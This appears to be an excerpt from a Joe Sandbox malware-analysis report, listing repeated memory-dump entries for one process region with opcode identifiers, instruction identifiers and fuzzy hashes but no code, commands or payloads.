                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e9bc35e7fbac9d6630245b9ae5f8ab4ba9f8d0eef28af4e8fe248c2d91f3fbb
                                                                                                                • Instruction ID: 5630ca1e7fb4ff91d56606c6aa99f10f84b66ee255b7dd38163fc58fb11fe643
                                                                                                                • Opcode Fuzzy Hash: 8e9bc35e7fbac9d6630245b9ae5f8ab4ba9f8d0eef28af4e8fe248c2d91f3fbb
                                                                                                                • Instruction Fuzzy Hash: 09913B30E10619CBDB60DF68C890BD9B7B1FF89310F208699D549AB356DB71AA85CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 95b29324d205cc3bd2202f42234d20e2ffd0717052a300d31adbb5fde5188550
                                                                                                                • Instruction ID: b21bd0c745740d111d6dd4c7b5fca87b794dc557b4d340f5ab2c98574e95857d
                                                                                                                • Opcode Fuzzy Hash: 95b29324d205cc3bd2202f42234d20e2ffd0717052a300d31adbb5fde5188550
                                                                                                                • Instruction Fuzzy Hash: 71911830E1061ACBDB60DF68C890BDDB7B1FF89310F208699D549AB345DB71AA85CF90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 98dec1bb6c4215707340073cee0d42d2ca809673c89771992e62d34b75eccc01
                                                                                                                • Instruction ID: e277fd7021e3b3fdd40d48f972d3f4008db49f4cd7d1fea93b028155c5f5c35b
                                                                                                                • Opcode Fuzzy Hash: 98dec1bb6c4215707340073cee0d42d2ca809673c89771992e62d34b75eccc01
                                                                                                                • Instruction Fuzzy Hash: E751E234B20145CFFF646668DD64BAF365AE789340F20552AE50AD37A9CA38CCC143A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 23351ec0dc7d6b8cb6bdcf18ce105348723e5a521c8a00c78453a23e2a93ee27
                                                                                                                • Instruction ID: d6ae7ee8d1577c865f7f702d50d06615e9be363ce2b805d9ba70fc2e22b3dfa0
                                                                                                                • Opcode Fuzzy Hash: 23351ec0dc7d6b8cb6bdcf18ce105348723e5a521c8a00c78453a23e2a93ee27
                                                                                                                • Instruction Fuzzy Hash: EE51C134B20105DBFF646668DD64B6F365EE789750F20542AE50AD37A9CA78CCC143E2
                                                                                                                Memory Dump Source
• Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a8c69fad23b7e6197d7c6ef3e1201ddb9863ba0ae8b81e8e6cf6c1e5a56eddbd
• Instruction ID: 7102d5206364c9fc287f37a203562bcc36cd777b8ec29fe1454ac0a2e63fc539
• Opcode Fuzzy Hash: a8c69fad23b7e6197d7c6ef3e1201ddb9863ba0ae8b81e8e6cf6c1e5a56eddbd
• Instruction Fuzzy Hash: E9513C30B11246DFDB94EB74D990BAE73F6EF89300F10856AC90ADB744EA709C52CB95
Memory Dump Source
• Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 70e3e0b12f4ff9b775f8e64c01806fb4492f47f0cebd392089a7ba718a7a1756
• Instruction ID: 52812e0f8b0ba418c2ab72801ce9da203d88dc9445aacef8dabc07557b5551e4
• Opcode Fuzzy Hash: 70e3e0b12f4ff9b775f8e64c01806fb4492f47f0cebd392089a7ba718a7a1756
• Instruction Fuzzy Hash: 96012831B045414FCB719ABCE894B6EB7D6DBCA714F145429E90AC7351DA35DC428386
Memory Dump Source
• Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2598ce51fce8ee14dee6ec89b987360d60ff101085893cafff6dd834eb150cab
• Instruction ID: 2aaf8e02ad9c19794839035a0eec3ab9155baf4e9f14ffd98d2457a4ef79458f
• Opcode Fuzzy Hash: 2598ce51fce8ee14dee6ec89b987360d60ff101085893cafff6dd834eb150cab
• Instruction Fuzzy Hash: 65018135B005114BDBA495ADE85476EB3DADBC9710F109439E60AC7350EA35DC824385